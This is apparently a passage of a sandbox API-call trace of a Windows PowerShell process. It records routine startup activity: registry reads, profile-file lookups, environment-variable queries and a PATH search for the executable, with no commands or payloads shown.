	[0527.847] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1adb58 | out: phkResult=0x1adb58*=0x394) returned 0x0
	[0527.847] RegQueryValueExW (in: hKey=0x394, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1adadc, lpData=0x0, lpcbData=0x1adad8*=0x0 | out: lpType=0x1adadc*=0x1, lpData=0x0, lpcbData=0x1adad8*=0x56) returned 0x0
	[0527.847] CoTaskMemAlloc (cb=0x5a) returned 0x1b855260
	[0527.847] RegQueryValueExW (in: hKey=0x394, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1adaac, lpData=0x1b855260, lpcbData=0x1adaa8*=0x56 | out: lpType=0x1adaac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1adaa8*=0x56) returned 0x0
	[0527.847] CoTaskMemFree (pv=0x1b855260) 
	[0527.847] RegCloseKey (hKey=0x394) returned 0x0
	[0527.848] CoTaskMemAlloc (cb=0x20c) returned 0x3a7850
	[0527.848] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3a7850 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0527.848] CoTaskMemFree (pv=0x3a7850) 
	[0527.848] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1ad710, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0527.848] CoTaskMemAlloc (cb=0x20c) returned 0x3a7850
	[0527.848] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3a7850 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0527.848] CoTaskMemFree (pv=0x3a7850) 
	[0527.848] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1ad710, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0527.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x1ad8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0527.851] SetErrorMode (uMode=0x1) returned 0x1
	[0527.851] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1adac0 | out: lpFileInformation=0x1adac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0527.851] SetErrorMode (uMode=0x1) returned 0x1
	[0527.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x1ad8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0527.852] SetErrorMode (uMode=0x1) returned 0x1
	[0527.852] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1adac0 | out: lpFileInformation=0x1adac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0527.852] SetErrorMode (uMode=0x1) returned 0x1
	[0527.852] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x1ad8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0527.852] SetErrorMode (uMode=0x1) returned 0x1
	[0527.852] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1adac0 | out: lpFileInformation=0x1adac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0527.852] SetErrorMode (uMode=0x1) returned 0x1
	[0527.852] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x1ad8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0527.852] SetErrorMode (uMode=0x1) returned 0x1
	[0527.853] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1adac0 | out: lpFileInformation=0x1adac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0527.853] SetErrorMode (uMode=0x1) returned 0x1
	[0527.855] CoTaskMemAlloc (cb=0x104) returned 0x434820
	[0527.855] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x434820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0527.855] CoTaskMemFree (pv=0x434820) 
	[0527.857] CoTaskMemAlloc (cb=0x104) returned 0x434820
	[0527.857] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x434820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0527.857] CoTaskMemFree (pv=0x434820) 
	[0527.859] CoTaskMemAlloc (cb=0x104) returned 0x434820
	[0527.859] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x434820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0527.859] CoTaskMemFree (pv=0x434820) 
	[0527.862] CoTaskMemAlloc (cb=0x104) returned 0x434820
	[0527.862] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x434820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0527.862] CoTaskMemFree (pv=0x434820) 
	[0527.868] CoTaskMemAlloc (cb=0x104) returned 0x434820
	[0527.868] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x434820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0527.868] CoTaskMemFree (pv=0x434820) 
	[0527.870] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x394
	[0527.870] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x300
	[0527.870] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x19c
	[0527.870] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x324
	[0527.870] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x328
	[0527.870] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x32c
	[0527.870] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x330
	[0527.870] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x334
	[0527.870] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x338
	[0527.870] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x398
	[0527.871] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x348
	[0527.871] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x34c
	[0527.873] CoTaskMemAlloc (cb=0x104) returned 0x434820
	[0527.873] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x434820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0527.873] CoTaskMemFree (pv=0x434820) 
	[0527.875] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0527.875] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x1adca0 | out: lpMode=0x1adca0) returned 1
	[0527.934] CoTaskMemAlloc (cb=0x104) returned 0x434820
	[0527.934] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x434820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0527.934] CoTaskMemFree (pv=0x434820) 
	[0527.937] SetEvent (hEvent=0x324) returned 1
	[0527.938] SetEvent (hEvent=0x394) returned 1
	[0527.938] SetEvent (hEvent=0x300) returned 1
	[0527.938] SetEvent (hEvent=0x19c) returned 1
	[0527.939] CoTaskMemAlloc (cb=0x104) returned 0x434820
	[0527.939] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x434820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0527.939] CoTaskMemFree (pv=0x434820) 
	[0527.940] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad9f8 | out: phkResult=0x1ad9f8*=0x354) returned 0x0
	[0527.940] RegQueryValueExW (in: hKey=0x354, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x1ad97c, lpData=0x0, lpcbData=0x1ad978*=0x0 | out: lpType=0x1ad97c*=0x0, lpData=0x0, lpcbData=0x1ad978*=0x0) returned 0x2

Thread:
	id = 453
	os_tid = 0x1104


Thread:
	id = 460
	os_tid = 0x1128


Thread:
	id = 734
	os_tid = 0x168c


Thread:
	id = 736
	os_tid = 0x1698


Thread:
	id = 743
	os_tid = 0x16e0


Thread:
	id = 766
	os_tid = 0x17a8


Thread:
	id = 767
	os_tid = 0x17b4

	[0449.411] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0493.151] LocalFree (hMem=0x3b72c0) returned 0x0
	[0493.151] CloseHandle (hObject=0x19c) returned 1
	[0493.151] CloseHandle (hObject=0x13) returned 1
	[0493.152] CloseHandle (hObject=0xf) returned 1
	[0493.152] RegCloseKey (hKey=0x300) returned 0x0
	[0493.153] RegCloseKey (hKey=0x2fc) returned 0x0
	[0493.153] RegCloseKey (hKey=0x2f8) returned 0x0
	[0493.153] LocalFree (hMem=0x3b7290) returned 0x0
	[0493.153] RegCloseKey (hKey=0x320) returned 0x0
	[0500.266] RegCloseKey (hKey=0x320) returned 0x0
	[0503.750] RegCloseKey (hKey=0x320) returned 0x0
	[0519.595] RegCloseKey (hKey=0x390) returned 0x0
	[0519.595] RegCloseKey (hKey=0x38c) returned 0x0
	[0519.595] RegCloseKey (hKey=0x368) returned 0x0
	[0519.595] RegCloseKey (hKey=0x3a4) returned 0x0
	[0519.596] RegCloseKey (hKey=0x384) returned 0x0
	[0519.596] RegCloseKey (hKey=0x380) returned 0x0
	[0519.596] RegCloseKey (hKey=0x37c) returned 0x0
	[0519.596] RegCloseKey (hKey=0x378) returned 0x0
	[0519.596] RegCloseKey (hKey=0x374) returned 0x0
	[0519.597] RegCloseKey (hKey=0x370) returned 0x0
	[0519.597] RegCloseKey (hKey=0x36c) returned 0x0
	[0519.597] RegCloseKey (hKey=0x344) returned 0x0
	[0519.597] RegCloseKey (hKey=0x3a0) returned 0x0
	[0519.598] RegCloseKey (hKey=0x39c) returned 0x0
	[0519.598] RegCloseKey (hKey=0x364) returned 0x0
	[0519.598] RegCloseKey (hKey=0x360) returned 0x0
	[0519.598] RegCloseKey (hKey=0x35c) returned 0x0
	[0519.598] RegCloseKey (hKey=0x358) returned 0x0
	[0519.599] RegCloseKey (hKey=0x354) returned 0x0
	[0519.599] RegCloseKey (hKey=0x350) returned 0x0
	[0519.599] RegCloseKey (hKey=0x34c) returned 0x0
	[0519.599] RegCloseKey (hKey=0x348) returned 0x0
	[0519.600] RegCloseKey (hKey=0x398) returned 0x0
	[0519.600] RegCloseKey (hKey=0x338) returned 0x0
	[0519.600] RegCloseKey (hKey=0x334) returned 0x0
	[0519.600] RegCloseKey (hKey=0x330) returned 0x0
	[0519.601] RegCloseKey (hKey=0x32c) returned 0x0
	[0519.601] RegCloseKey (hKey=0x328) returned 0x0
	[0519.601] RegCloseKey (hKey=0x324) returned 0x0
	[0519.601] RegCloseKey (hKey=0x19c) returned 0x0
	[0519.602] RegCloseKey (hKey=0x300) returned 0x0
	[0519.602] RegCloseKey (hKey=0x394) returned 0x0
	[0519.602] RegCloseKey (hKey=0x2d8) returned 0x0
	[0539.178] RegCloseKey (hKey=0x354) returned 0x0

Thread:
	id = 869
	os_tid = 0x11c


Thread:
	id = 1012
	os_tid = 0x1aec

	[0529.109] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0529.113] SetThreadUILanguage (LangId=0x0) returned 0x7fffff00409
	[0529.118] CoTaskMemAlloc (cb=0x104) returned 0x434820
	[0529.118] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x434820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0529.118] CoTaskMemFree (pv=0x434820) 
	[0529.119] VirtualQuery (in: lpAddress=0x1c80dcc0, lpBuffer=0x1c80eb80, dwLength=0x30 | out: lpBuffer=0x1c80eb80*(BaseAddress=0x1c80d000, AllocationBase=0x1be80000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0529.122] CoTaskMemAlloc (cb=0x104) returned 0x434820
	[0529.122] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x434820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0529.123] CoTaskMemFree (pv=0x434820) 
	[0529.125] CoTaskMemAlloc (cb=0x104) returned 0x434820
	[0529.125] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x434820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0529.125] CoTaskMemFree (pv=0x434820) 
	[0529.128] CoTaskMemAlloc (cb=0x104) returned 0x434820
	[0529.128] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x434820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0529.129] CoTaskMemFree (pv=0x434820) 
	[0529.145] CoTaskMemAlloc (cb=0x104) returned 0x434820
	[0529.145] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x434820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0529.145] CoTaskMemFree (pv=0x434820) 
	[0529.147] CoTaskMemAlloc (cb=0x104) returned 0x434820
	[0529.147] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x434820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0529.148] CoTaskMemFree (pv=0x434820) 
	[0529.149] CoTaskMemAlloc (cb=0x104) returned 0x434820
	[0529.149] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x434820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0529.149] CoTaskMemFree (pv=0x434820) 
	[0529.154] VirtualQuery (in: lpAddress=0x1c80df70, lpBuffer=0x1c80ee30, dwLength=0x30 | out: lpBuffer=0x1c80ee30*(BaseAddress=0x1c80d000, AllocationBase=0x1be80000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0529.155] CoTaskMemAlloc (cb=0x104) returned 0x434820
	[0529.155] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x434820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0529.155] CoTaskMemFree (pv=0x434820) 
	[0530.288] CoTaskMemAlloc (cb=0x104) returned 0x434820
	[0530.288] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x434820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0530.288] CoTaskMemFree (pv=0x434820) 
	[0530.288] CoTaskMemAlloc (cb=0x104) returned 0x434820
	[0530.288] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x434820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0530.288] CoTaskMemFree (pv=0x434820) 
	[0530.290] CoTaskMemAlloc (cb=0x104) returned 0x434820
	[0530.290] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x434820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0530.290] CoTaskMemFree (pv=0x434820) 
	[0530.294] CoTaskMemAlloc (cb=0x104) returned 0x434820
	[0530.294] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x434820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0530.294] CoTaskMemFree (pv=0x434820) 
	[0531.299] CoTaskMemAlloc (cb=0x104) returned 0x434820
	[0531.299] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x434820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0531.299] CoTaskMemFree (pv=0x434820) 
	[0531.301] CoTaskMemAlloc (cb=0x104) returned 0x434820
	[0531.301] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x434820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0531.301] CoTaskMemFree (pv=0x434820) 
	[0531.302] CoTaskMemAlloc (cb=0x104) returned 0x434820
	[0531.302] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x434820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0531.302] CoTaskMemFree (pv=0x434820) 
	[0531.305] CoTaskMemAlloc (cb=0x104) returned 0x434820
	[0531.305] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x434820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0531.305] CoTaskMemFree (pv=0x434820) 
	[0531.306] CoTaskMemAlloc (cb=0x104) returned 0x434820
	[0531.306] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x434820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0531.306] CoTaskMemFree (pv=0x434820) 
	[0531.308] CoTaskMemAlloc (cb=0x104) returned 0x434820
	[0531.308] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x434820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0531.315] CoTaskMemFree (pv=0x434820) 
	[0531.317] CoTaskMemAlloc (cb=0x104) returned 0x434820
	[0531.317] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x434820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0531.317] CoTaskMemFree (pv=0x434820) 
	[0532.257] CoTaskMemAlloc (cb=0x104) returned 0x434820
	[0532.257] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x434820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0532.257] CoTaskMemFree (pv=0x434820) 
	[0533.064] CoTaskMemAlloc (cb=0x104) returned 0x434820
	[0533.064] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x434820, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0533.064] CoTaskMemFree (pv=0x434820) 
	[0533.067] CoTaskMemAlloc (cb=0x104) returned 0x434820
	[0533.067] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x434820, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0533.067] CoTaskMemFree (pv=0x434820) 
	[0533.067] CoTaskMemAlloc (cb=0x128) returned 0x40e770
	[0533.067] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x40e770, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0533.068] CoTaskMemFree (pv=0x40e770) 
	[0533.072] CoTaskMemAlloc (cb=0x20e) returned 0x3a94c0
	[0533.072] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x3a94c0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0533.072] CoTaskMemFree (pv=0x3a94c0) 
	[0533.076] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0533.077] SetErrorMode (uMode=0x1) returned 0x1
	[0533.080] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0533.855] SetErrorMode (uMode=0x1) returned 0x1
	[0533.856] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0533.856] SetErrorMode (uMode=0x1) returned 0x1
	[0533.857] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0533.865] SetErrorMode (uMode=0x1) returned 0x1
	[0533.866] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0533.866] SetErrorMode (uMode=0x1) returned 0x1
	[0533.866] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0533.874] SetErrorMode (uMode=0x1) returned 0x1
	[0533.876] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0533.876] SetErrorMode (uMode=0x1) returned 0x1
	[0533.876] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0533.884] SetErrorMode (uMode=0x1) returned 0x1
	[0533.885] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0533.885] SetErrorMode (uMode=0x1) returned 0x1
	[0533.885] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0533.893] SetErrorMode (uMode=0x1) returned 0x1
	[0533.895] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0533.895] SetErrorMode (uMode=0x1) returned 0x1
	[0533.895] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0534.668] SetErrorMode (uMode=0x1) returned 0x1
	[0534.669] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0534.669] SetErrorMode (uMode=0x1) returned 0x1
